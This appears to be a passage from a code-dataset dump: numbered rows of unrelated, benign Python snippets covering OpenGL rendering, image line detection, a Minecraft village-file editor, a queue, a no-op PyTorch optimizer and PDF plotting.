            # Force a rebuild by invalidating the cached version.
            self._current_scene = scene
            self._scene_version = -1
        if self._scene_version != scene.version:
            self._current_scene = scene
            self._scene_version = scene.version
            self._program = material.compile(
                num_lights=len(scene.lights),
                num_shadow_sources=len(scene.shadow_sources),
                use_radiance_map=scene.radiance_map is not None)
            # Scene-dependent data is only re-uploaded on rebuild.
            material.upload_attributes(self._program, self._attributes, self._uv_scale)
            material.upload_radmap(self._program, scene.radiance_map)
            material.upload_shadow_sources(self._program, scene.shadow_sources)
            material.upload_lights(self._program, scene.lights)
        # Camera and model transform change per frame.
        material.upload_camera(self._program, camera)
        self._program['u_model'] = self.model_mat.T
        return self._program
def mesh_to_renderables(mesh: Mesh, model_mat):
    """Split *mesh* into one Renderable per material.

    Expands per-face attributes (positions, normals, tangents, UVs) for
    each material's faces; materials with fewer than 3 vertices (no
    complete triangle) are skipped with a warning.
    """
    renderables = []
    # For now each renderable represents a submesh with the same materials.
    for material_id, material_name in enumerate(mesh.materials):
        filter = {'material': material_id}
        vertex_positions = mesh.expand_face_vertices(filter)
        vertex_normals = mesh.expand_face_normals(filter)
        vertex_tangents, vertex_bitangents = mesh.expand_tangents(
            filter)
        vertex_uvs = mesh.expand_face_uvs(filter)
        if len(vertex_positions) < 3:
            logger.warning('Material {} not visible.'.format(material_name))
            continue
        attributes = dict(
            a_position=vertex_positions,
            a_normal=vertex_normals,
            a_tangent=vertex_tangents,
            a_bitangent=vertex_bitangents,
            a_uv=vertex_uvs
        )
        renderables.append(Renderable(material_name, attributes, model_mat,
                                      uv_scale=mesh.uv_scale))
    return renderables
class DummyRenderer(app.Canvas):
    """Invisible vispy canvas used only to provide an OpenGL context."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        gloo.set_viewport(0, 0, *self.size)
    def __enter__(self):
        # Warm up the backend so GL calls are valid inside the with-block.
        self._backend._vispy_warmup()
        return self
class ContextProvider:
    """Context manager yielding a usable GL context of a given size.

    Reuses the current canvas when one is open (restoring its viewport
    on exit), otherwise spins up a temporary DummyRenderer.
    """
    def __init__(self, size):
        self.size = size
        canvas = gloo.get_current_canvas()
        self.context_exists = canvas is not None and not canvas._closed
        if self.context_exists:
            logger.debug("Using existing OpenGL context.")
            self.provider = gloo.get_current_canvas()
            self.previous_size = self.provider.size
        else:
            logger.debug("Providing temporary context with DummyRenderer.")
            self.provider = DummyRenderer(size=size)
    def __enter__(self):
        # NOTE(review): the DummyRenderer's own __enter__ (backend warmup)
        # is never invoked here, only the viewport is set -- confirm
        # intentional.
        gloo.set_viewport(0, 0, *self.size)
    def __exit__(self, exc_type, exc_val, exc_tb):
        if not self.context_exists:
            self.provider.__exit__(exc_type, exc_val, exc_tb)
        else:
            gloo.set_viewport(0, 0, *self.previous_size)
def draw_depth(camera, renderables, rend_target):
    """Render a depth pass of *renderables* into rend_target's framebuffer.

    Front faces are culled (classic shadow-map bias trick); GL cull state
    is restored before returning.
    """
    rendfb, rendtex, _ = rend_target
    material = DepthMaterial()
    # Fixed: compile the program from the material instance we already
    # created instead of instantiating a second, redundant DepthMaterial().
    program = material.compile()
    with rendfb:
        gloo.clear(color=camera.clear_color)
        gloo.set_state(depth_test=True)
        gl.glEnable(gl.GL_CULL_FACE)
        gl.glCullFace(gl.GL_FRONT)
        for renderable in renderables:
            material.upload_camera(program, camera)
            material.upload_attributes(program, renderable._attributes)
            program['u_model'] = renderable.model_mat.T
            program.draw(gl.GL_TRIANGLES)
        gl.glCullFace(gl.GL_BACK)
        gl.glDisable(gl.GL_CULL_FACE)
7,192 | 34c91d273648ae72731fba7f5519a4920d77c0c3 | include ("RecExRecoTest/RecExRecoTest_RTT_common.py")
from BTagging.BTaggingFlags import BTaggingFlags
BTaggingFlags.Active=False
# main jobOption
include ("RecExCommon/rdotoesdnotrigger.py")
include ("RecExRecoTest/RecExRecoTest_RTT_common_postOptions.py")
|
7,193 | f0f9541eba29b4488c429c889f3b346d53d0239d | import json
# Parse a small JSON document and print one field.
data = '{"var1": "harry", "var2":56}'
parsed = json.loads(data)
print(parsed['var1'])
# data2 = {"channel_name": "Chill_Out",
# "Cars": ["BMW", "Audi a8", "ferrari"],
# "fridge": ("loki", "Aalu", "pasta"),
# "isbad": False
# }
# jscomp = json.dumps(data2)
# print(jscomp)
7,194 | 9a60449aa13bc5e7e413d0e47a1972d93ccfe69f | a=input().split(' ')
A=int(a[0])
B=int(a[1])
X=int(a[2])
if A<=X and A+B>=X:
print('YES')
else:
print('NO') |
7,195 | bb5bea4ea100950b59fb2b168b75dec349938aac | import numpy as np
import cv2
import myrustlib
def detect_lines_hough(img):
    """Detect axis-aligned line segments in a binary image via HoughLinesP.

    Returns a list of (x1, y1, x2, y2) segments.
    """
    lines = cv2.HoughLinesP(
        cv2.bitwise_not(img),  # fixed: was `opening`, an undefined name (NameError)
        rho = 1,
        theta = np.pi / 2,  # quantize to horizontal/vertical only
        threshold=50,
        minLineLength=120,
        maxLineGap=10
    )
    return [line[0] for line in lines]  # unwrap HoughLinesP's nested output
def detect_lines_rust(img, min_line_length):
    """Rust-accelerated variant of detect_lines (same contract).

    Flattens the white-pixel mask to a list of booleans for the
    myrustlib extension, then splits the detected segments by orientation.
    """
    height, width = img.shape
    white = (img == 255).flatten().tolist()
    detected = myrustlib.detect_lines(white, width, height, min_line_length)
    return split_by_orientation(detected)
def detect_lines(img, min_line_length):
    """
    Custom line detection algorithm

    Scans a thresholded image (white pixels == 255) row by row for
    horizontal runs, then column by column for vertical runs, keeping
    runs strictly longer than *min_line_length*.
    Horizontal lines are (x_start, y, x_end, y); vertical lines are
    (x, y_end, x, y_start) with y_end >= y_start.
    NOTE(review): the end-of-row/column close-out records x - 1 / y - 1
    even though the run extends to the final index -- looks off by one
    for runs touching the right/bottom border; confirm.
    """
    height, width = img.shape
    horizontal = []
    vertical = []
    current_line = False
    current_line_start = 0
    white = img == 255
    # Pass 1: horizontal runs, one image row at a time.
    for y in range(height):
        for x in range(width):
            is_white = white.item(y,x)
            if(is_white):
                if not current_line:
                    current_line = True
                    current_line_start = x
            else:
                if current_line:
                    current_line = False
                    if x - current_line_start > min_line_length:
                        horizontal.append((current_line_start, y, x - 1, y))
        # Close a run still open at the end of the row.
        if current_line:
            current_line = False
            if x - current_line_start > min_line_length:
                horizontal.append((current_line_start, y, x - 1, y))
        current_line = False
        current_line_start = 0
    # Pass 2: vertical runs, one image column at a time.
    for x in range(width):
        for y in range(height):
            is_white = white.item(y,x)
            if(is_white):
                if not current_line:
                    current_line = True
                    current_line_start = y
            else:
                if current_line:
                    current_line = False
                    if y - current_line_start > min_line_length:
                        vertical.append((x, y - 1, x, current_line_start))
        # Close a run still open at the end of the column.
        if current_line:
            current_line = False
            if y - current_line_start > min_line_length:
                vertical.append((x, y - 1, x, current_line_start))
    return (horizontal, vertical)
def remove_lines_close_to_border(horizontal, vertical, width, height, min_distance):
    """Drop horizontals whose y (and verticals whose x) lie within
    *min_distance* of the image border; returns (horizontal, vertical)."""
    kept_horizontal = [line for line in horizontal
                       if min_distance < line[1] < height - min_distance]
    kept_vertical = [line for line in vertical
                     if min_distance < line[0] < width - min_distance]
    return (kept_horizontal, kept_vertical)
def split_by_orientation(lines):
    """Partition segments into (horizontal, vertical) by dominant axis;
    diagonal ties count as horizontal."""
    horizontal = []
    vertical = []
    for line in lines:
        x1, y1, x2, y2 = line
        bucket = vertical if abs(y1 - y2) > abs(x1 - x2) else horizontal
        bucket.append((x1, y1, x2, y2))
    return (horizontal, vertical)
def reduce_lines(input_horizontal, input_vertical, min_distance):
    """
    Takes a list of vertical and horizontal lines,
    tries to reduce them to essential lines eliminating lines close to each
    other.

    NOTE(review): clustering compares every line only to the FIRST line
    of its cluster (not transitively), each line also merges with itself
    (its coordinate is counted twice in the average), and verticals
    average only the x1 values while horizontals average both y
    endpoints -- confirm these asymmetries are intended.
    """
    seen_vertical = set()
    seen_horizontal = set()
    output_vertical = []
    output_horizontal = []
    # vertical
    for index, (x1,y1,x2,y2) in enumerate(input_vertical):
        if index in seen_vertical:
            continue
        x_values = [x1]
        for other_index, (x1_b,y1_b,x2_b,y2_b) in enumerate(input_vertical):
            if other_index in seen_vertical:
                continue
            if (abs(x1 - x1_b) < min_distance):
                # if the end is further to the top, choose this end
                if (y2_b < y2):
                    y2 = y2_b
                # if the start if further to the bottom, choose it
                if (y1_b > y1):
                    y1 = y1_b
                x_values.append(x1_b)
                seen_vertical.add(other_index)
        # taking the average x value for all the lines to get the middle
        x = int(np.mean(x_values))
        output_vertical.append((x,y1,x,y2))
    #horizontal
    for index, (x1,y1,x2,y2) in enumerate(input_horizontal):
        if index in seen_horizontal:
            continue
        y_values = [y1, y2]
        for other_index, (x1_b,y1_b,x2_b,y2_b) in enumerate(input_horizontal):
            if other_index in seen_horizontal:
                continue
            if (abs(y1 - y1_b) < min_distance):
                # if the start if further to the left, choose this point
                if (x1_b < x1):
                    x1 = x1_b
                # if the end is further to the right, choose it
                if (x2_b > x2):
                    x2 = x2_b
                y_values += [y1_b, y2_b]
                seen_horizontal.add(other_index)
        # taking the average y value for all the lines to get the middle
        y = int(np.mean(y_values))
        output_horizontal.append((x1,y,x2,y))
    return (output_vertical, output_horizontal)
def connect_lines(horizontal_lines, vertical_lines):
    """
    Snap every line end to the nearest crossing line so all ends touch.

    Each horizontal end moves to the vertical whose x is closest to it;
    each vertical end moves to the horizontal whose y is closest.
    Ties and the no-candidate case fall back to a sentinel offset of
    20000, exactly as in the original implementation.
    Possible improvements:
    - Prefer crossing lines in the direction of the end being snapped.
    - Check the crossing line is long enough to actually cross here.
    """
    def _best_gap(end, anchors):
        # Signed offset from *end* to its nearest anchor coordinate;
        # min(..., key=abs) keeps the first of equals, matching the
        # original's strict '<' update rule (20000 is the sentinel).
        return min([20000] + [end - a for a in anchors], key=abs)

    vertical_xs = [line[0] for line in vertical_lines]
    horizontal_ys = [line[1] for line in horizontal_lines]
    snapped_horizontal = []
    snapped_vertical = []
    for x1, y1, x2, y2 in horizontal_lines:
        left = x1 - _best_gap(x1, vertical_xs)
        right = x2 - _best_gap(x2, vertical_xs)
        snapped_horizontal.append((left, y1, right, y2))
    for x1, y1, x2, y2 in vertical_lines:
        top = y1 - _best_gap(y1, horizontal_ys)
        bottom = y2 - _best_gap(y2, horizontal_ys)
        snapped_vertical.append((x1, top, x2, bottom))
    return (snapped_horizontal, snapped_vertical)
def find_rectangles(top_left, bottom_left, bottom_right, top_right):
    """For each top-left corner, pair it with the nearest top-right corner
    on the same row and the nearest bottom-left corner in the same column,
    yielding (x, y, w, h) rectangles.

    NOTE: sorts *top_right* and *bottom_right*'s sibling *bottom_left*
    in place, as the original did.
    """
    top_right.sort(key=lambda pos: pos[0])
    bottom_left.sort(key=lambda pos: pos[1])
    rectangles = []
    for x, y in top_left:
        right_matches = [(tx, ty) for tx, ty in top_right if ty == y and tx > x]
        below_matches = [(bx, by) for bx, by in bottom_left if bx == x and by > y]
        if right_matches and below_matches:
            x2 = right_matches[0][0]
            y2 = below_matches[0][1]
            rectangles.append((x, y, x2 - x, y2 - y))
    return rectangles
def find_corners(horizontal, vertical):
    """Classify every horizontal/vertical crossing by the corner types it forms.

    Assumes verticals are (x, y_bottom, x, y_top) with y_bottom >= y_top
    and horizontals are (x1, y, x2, y) with x1 <= x2, as produced by
    detect_lines -- the containment test relies on that ordering.
    A crossing in the interior of both lines is a corner of all four
    kinds; a crossing at an endpoint only yields the corner types that do
    not require the line to continue past that end.
    Returns (top_left, bottom_left, bottom_right, top_right) point lists.
    """
    top_left = []
    top_right = []
    bottom_left = []
    bottom_right = []
    for x_1,y_h,x_2,_ in horizontal:
        for x_v,y_1,_,y_2 in vertical:
            crossing = (x_v, y_h)
            # Crossing must lie within the horizontal's x-span and the
            # vertical's y-span (y_1 is the bottom end, y_2 the top).
            if (x_v >= x_1 and x_v <= x_2 and y_h <= y_1 and y_h >= y_2):
                if (x_1 == x_v):
                    # left end of the horizontal
                    if (y_1 != y_h):
                        bottom_left.append(crossing)
                    if (y_2 != y_h):
                        top_left.append(crossing)
                elif (x_2 == x_v):
                    # right end of the horizontal
                    if (y_1 != y_h):
                        bottom_right.append(crossing)
                    if (y_2 != y_h):
                        top_right.append(crossing)
                else:
                    # interior of the horizontal: corner types depend only
                    # on whether the vertical continues above/below.
                    if y_1 != y_h:
                        top_left.append(crossing)
                        top_right.append(crossing)
                    if y_2 != y_h:
                        bottom_left.append(crossing)
                        bottom_right.append(crossing)
    return (top_left, bottom_left, bottom_right, top_right)
|
7,196 | 4e9674ea46bdf930d1e99bcda56eaa300c84deef | from nbt import nbt
from matplotlib import pyplot
class Banana(object):
    # Placeholder element type handed to nbt.TAG_List for empty lists.
    # NOTE(review): id = 10 presumably matches the NBT compound-tag id
    # expected by the nbt library -- confirm.
    id = 10
def srange(x1, xDoors, spaces):
    """
    Yield two runs of consecutive ints: x1 .. x1+xDoors-1, then (after a
    gap of *spaces*) x1+xDoors+spaces .. x1+2*xDoors+spaces-1.
    Used to lay out a village's two rows of door positions.
    (Python 2: uses xrange.)
    """
    for a in xrange(x1, x1 + xDoors):
        yield a
    for a in xrange(x1 + xDoors + spaces, x1 + spaces + xDoors * 2):
        yield a
def village_doors_coordinates(x1, villages, y, z1, halfDoorsInVillage, emptySpaces, axis):
    """
    Build door coordinates for *villages* villages laid out side by side.

    x1 and z1 are the lowest value on the X / Z axis;
    'halfDoorsInVillage' is 1/2 of the total doors in a village;
    'emptySpaces' is the gap between a village's two door rows.
    :param axis: The axis ('X' or 'Z') along which a single village's
        doors are laid out; villages are then stacked along the other axis.
    :return: list with one entry per village, each a list of [x, y, z]
        door coordinates.
    """
    k = []
    assert axis in ('X', 'Z')
    if axis == "Z":
        for x in xrange(x1, x1 + villages):
            j = [[x, y, z] for z in srange(z1, halfDoorsInVillage, emptySpaces)]
            k.append(j)
    elif axis == "X":
        for z in xrange(z1, z1 + villages):
            j = [[x, y, z] for x in srange(x1, halfDoorsInVillage, emptySpaces)]
            k.append(j)
    return k
# Script defaults: how many villages / doors to generate, and the world
# tick used when creating a brand-new villages.dat.
number_of_villages_to_generate = 32
number_of_doors_to_generate = 22
tick = 77
def template_village_file(tick):
    """
    Create a template villages.dat NBT structure: an empty Villages list
    plus the global Tick, ready to be populated and written out.
    """
    cat = nbt.NBTFile()
    cat2 = cat['data'] = nbt.TAG_Compound()
    cat2["Villages"] = nbt.TAG_List(Banana)
    cat2['Tick'] = nbt.TAG_Int(tick)
    return cat
def existing_village_file(kovetz):
    """
    Open an existing villages.dat at path *kovetz* and return
    (nbt_file, tick) so new villages can reuse the file's own tick value.
    Raises a generic Exception when the file does not exist.
    """
    try:
        cat77 = nbt.NBTFile(kovetz)
    except IOError:
        raise Exception("Hmm. Unfortunately, the file requested does not exist :(")
    tick4 = cat77['data']['Tick'].value
    return cat77, tick4
class Village(object):
    """
    Wrapper around a village TAG_Compound from villages.dat.

    Keeps the aggregate door-position sums (ACX/ACY/ACZ) and the derived
    center (CX/CY/CZ) consistent as doors are added and removed.
    :type village: nbt.TAG_Compound
    """
    def __init__(self, village):
        self._village = village
    def add_door(self, door):
        """
        Append *door* and update the aggregate sums and center.
        """
        doors_list = self._village['Doors']
        doors_list.append(door)
        x = door['X'].value
        y = door['Y'].value
        z = door['Z'].value
        self._update_doormath(x, y, z)
    def del_doorz(self, new_doors):
        # Remove every door whose (x, y, z) is in *new_doors*; the
        # aggregates are updated with negated coords to subtract them.
        kapoow = self.get_vil()['Doors']
        kapooww = list(kapoow)
        for door in kapooww:
            x, y, z = door['X'].value, door['Y'].value, door['Z'].value
            if (x, y, z) in new_doors:
                kapoow.remove(door)
                self._update_doormath(-x, -y, -z)
    def _update_doormath(self, x, y, z):
        # Fold (x, y, z) into the running sums and recompute the center
        # as the mean over the current doors (zeroed when empty).
        doors_list = self._village['Doors']
        self._village['ACX'].value += x
        self._village['ACY'].value += y
        self._village['ACZ'].value += z
        if len(doors_list) == 0:
            self._village['CX'] = nbt.TAG_Int(0)
            self._village['CY'] = nbt.TAG_Int(0)
            self._village['CZ'] = nbt.TAG_Int(0)
        else:
            self._village['CX'].value = self._village['ACX'].value / len(doors_list)
            self._village['CY'].value = self._village['ACY'].value / len(doors_list)
            self._village['CZ'].value = self._village['ACZ'].value / len(doors_list)
    @property
    def is_empty(self):
        # True when the village has no doors left.
        return len(self._village["Doors"]) == 0
    def get_vil(self):
        # Return the underlying TAG_Compound.
        return self._village
    @staticmethod
    def create_village(tick):
        """
        Create a fresh village compound with default fields, wrapped in a
        Village.
        """
        village_template = nbt.TAG_Compound()
        village_template['Doors'] = nbt.TAG_List(Banana)
        village_template['Players'] = nbt.TAG_List(Banana)
        village_template['ACX'] = nbt.TAG_Int(0)
        village_template['ACY'] = nbt.TAG_Int(0)
        village_template['ACZ'] = nbt.TAG_Int(0)
        village_template['CX'] = nbt.TAG_Int(0)
        village_template['CY'] = nbt.TAG_Int(0)
        village_template['CZ'] = nbt.TAG_Int(0)
        village_template['Golems'] = nbt.TAG_Int(0)
        village_template['MTick'] = nbt.TAG_Int(0)
        village_template['PopSize'] = nbt.TAG_Int(1)
        village_template['Radius'] = nbt.TAG_Int(32)
        village_template['Stable'] = nbt.TAG_Int(tick)
        village_template['Tick'] = nbt.TAG_Int(tick)
        return Village(village_template)
def create_door(tick, x, y, z):
    """
    Build a door TAG_Compound at (x, y, z) stamped with *tick*.
    """
    door = nbt.TAG_Compound()
    for tag_name, value in (('TS', tick), ('X', x), ('Y', y), ('Z', z)):
        door[tag_name] = nbt.TAG_Int(value)
    return door
def del_door(vil_list, doors_set):
    """
    Remove every door whose coords appear in *doors_set* from each
    village in *vil_list*; villages left with no doors are dropped.
    :param vil_list: nbt TAG_List of village compounds (mutated in place)
    :param doors_set: set of (x, y, z) tuples
    """
    vil85 = list(vil_list)
    for vil_TAGCompound in vil85:
        villl = Village(vil_TAGCompound)
        villl.del_doorz(doors_set)
        if villl.is_empty:
            vil_list.remove(vil_TAGCompound)
def village_gen(x1, villages, y_list, z1, halfDoorsInVillage, emptySpaces, axis, tick, cat):
    """Generate rows of villages (and their doors) into the NBT file *cat*.

    x1, z1            -- lowest X/Z block of the layout
    y_list            -- Y levels (lower door block) at which rows are made
    villages          -- number of villages to create per layer
    halfDoorsInVillage-- half the door count of each village
    emptySpaces       -- gap between the two half-rows of doors in a village
    axis              -- axis ('X' or 'Z') along which one village's doors run
    tick              -- current world tick; for an existing file it must match
                         the file's own tick, for a new file anything but 0
    cat               -- the parsed villages.dat NBT root
    """
    data = cat["data"]

    # Collect per-village door coordinate lists across all requested Y levels.
    per_village_coords = []
    for y in y_list:
        per_village_coords += village_doors_coordinates(x1, villages, y, z1, halfDoorsInVillage, emptySpaces, axis)

    # Flatten to a set so any existing copies of these doors can be purged.
    all_door_coords = {tuple(coord) for vill in per_village_coords for coord in vill}
    del_door(data['Villages'], all_door_coords)

    # Re-create each village with freshly stamped doors and register it.
    for coords in per_village_coords:
        village = Village.create_village(tick)
        for x, y, z in coords:
            village.add_door(create_door(tick, x, y, z))
        data['Villages'].append(village.get_vil())
def main():
    """Load villagesCopy2.dat, regenerate the configured villages, save it back."""
    cat1, tick = existing_village_file("./villagesCopy2.dat")
    # BUG FIX: use floor division -- in Python 3, `/ 2` yields a float, but
    # halfDoorsInVillage is a door *count* and must stay an integer for the
    # downstream coordinate/range math.
    village_gen(-107, number_of_villages_to_generate, [132], 169, number_of_doors_to_generate // 2, 19, 'X', tick, cat1)
    cat1.write_file("./villagesCopy2.dat")


if __name__ == '__main__':
    main()
7,197 | 2898506b9fd5b112f93a1ff6b010848244c398bd | from collections import deque
class Queue:
    """FIFO queue backed by collections.deque.

    New items enter at the left end; the oldest item sits at the right
    end, so dequeue/front operate on the right.
    """

    def __init__(self):
        self.container = deque()

    def enqueue(self, data):
        """Add *data* to the back of the queue."""
        self.container.appendleft(data)

    def dequeue(self):
        """Remove and return the oldest item (IndexError when empty)."""
        return self.container.pop()

    def is_empty(self):
        """Return True when the queue holds no items."""
        return not self.container

    def size(self):
        """Return the number of queued items."""
        return len(self.container)

    def front(self):
        """Return (without removing) the oldest item, or None when empty."""
        if self.is_empty():
            return None
        return self.container[-1]
def binary_numbers(n):
    """Print the binary representations of 1..n, one per line, in order.

    Classic BFS-style generation: each printed value "b" spawns children
    "b0" and "b1" at the back of a FIFO queue, so values emerge in
    ascending numeric order.  (The Queue helper is inlined onto the
    deque it wraps; the operations are identical.)
    """
    pending = deque()
    pending.appendleft("1")
    for _ in range(n):
        current = pending[-1]          # front of the queue
        print(" ", current)
        pending.appendleft(current + "0")
        pending.appendleft(current + "1")
        pending.pop()                  # dequeue the value just printed


if __name__ == '__main__':
    binary_numbers(20)
7,198 | 3c7237e5770dd5552c327dbf53451a2889ea8c6b | import torch
import typing
__all__ = ['NoOp']
class Null(torch.optim.Optimizer):
    """Optimizer that registers parameters but never updates them.

    Useful as a stand-in where an Optimizer instance is required but no
    training should occur.  The lr/eps defaults are placeholders only.
    """

    def __init__(self,
                 parameters: typing.Iterator[torch.nn.Parameter],
                 ):
        defaults = {"lr": 0.0, "eps": 1e-8}
        super().__init__(parameters, defaults)

    def step(self, closure=None):
        """Evaluate *closure* (if given) for its side effects; change nothing.

        Always returns None, unlike stock optimizers which return the
        closure's loss.
        """
        if closure is not None:
            closure()
        return None
class NoOp(object):
    """Drop-in optimizer stand-in whose step() does nothing at all.

    Wraps a single Null optimizer so callers expecting an object with an
    ``optimizers`` list and a ``step`` method keep working unchanged.
    """

    def __init__(self,
                 parameters: typing.Iterator[torch.nn.Parameter],
                 ):
        self.optimizers = [Null(parameters)]

    def step(self, closure=None):
        """Do nothing; unlike Null.step, the *closure* is never evaluated."""
        return None
7,199 | 146db68fb84569b914fa741457c595108088dc63 | from matplotlib.backends.backend_pdf import PdfPages
import matplotlib.pyplot as plt
from scipy.misc import imread
import os
import numpy as np
# Input images, looked up under C:/temp/ by plotImage below.
files = [ "oracle.PNG",
"SQL.jpg" ]
def plotImage(f):
    """Render image file *f* (found under C:/temp/) into the current axes.

    Pixel values are scaled to [0, 1] float32 and both axes are hidden so
    the image fills its subplot without tick clutter.

    NOTE(review): scipy.misc.imread was removed in SciPy 1.2 -- on modern
    installs this needs imageio.imread (or matplotlib.pyplot.imread, minding
    its different PNG normalization).
    """
    folder = "C:/temp/"
    path = os.path.join(folder, f)
    image = imread(path).astype(np.float32) / 255
    plt.imshow(image)
    axes = plt.gca()
    axes.get_xaxis().set_visible(False)  # hide tick marks/labels
    axes.get_yaxis().set_visible(False)
# Assemble a PDF: each savefig() call appends the current figure as a page.
pp = PdfPages("c:/temp/page1.pdf")
plt.subplot(121)
plotImage(files[0])
plt.subplot(122)
plotImage(files[1])
pp.savefig(plt.gcf()) # page 1: the side-by-side figure assembled above
pp.savefig(plt.gcf()) # page 2: the SAME figure again -- NOTE(review): duplicate page; likely only one savefig was intended
pp.close()  # flush and finalize the PDF file
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.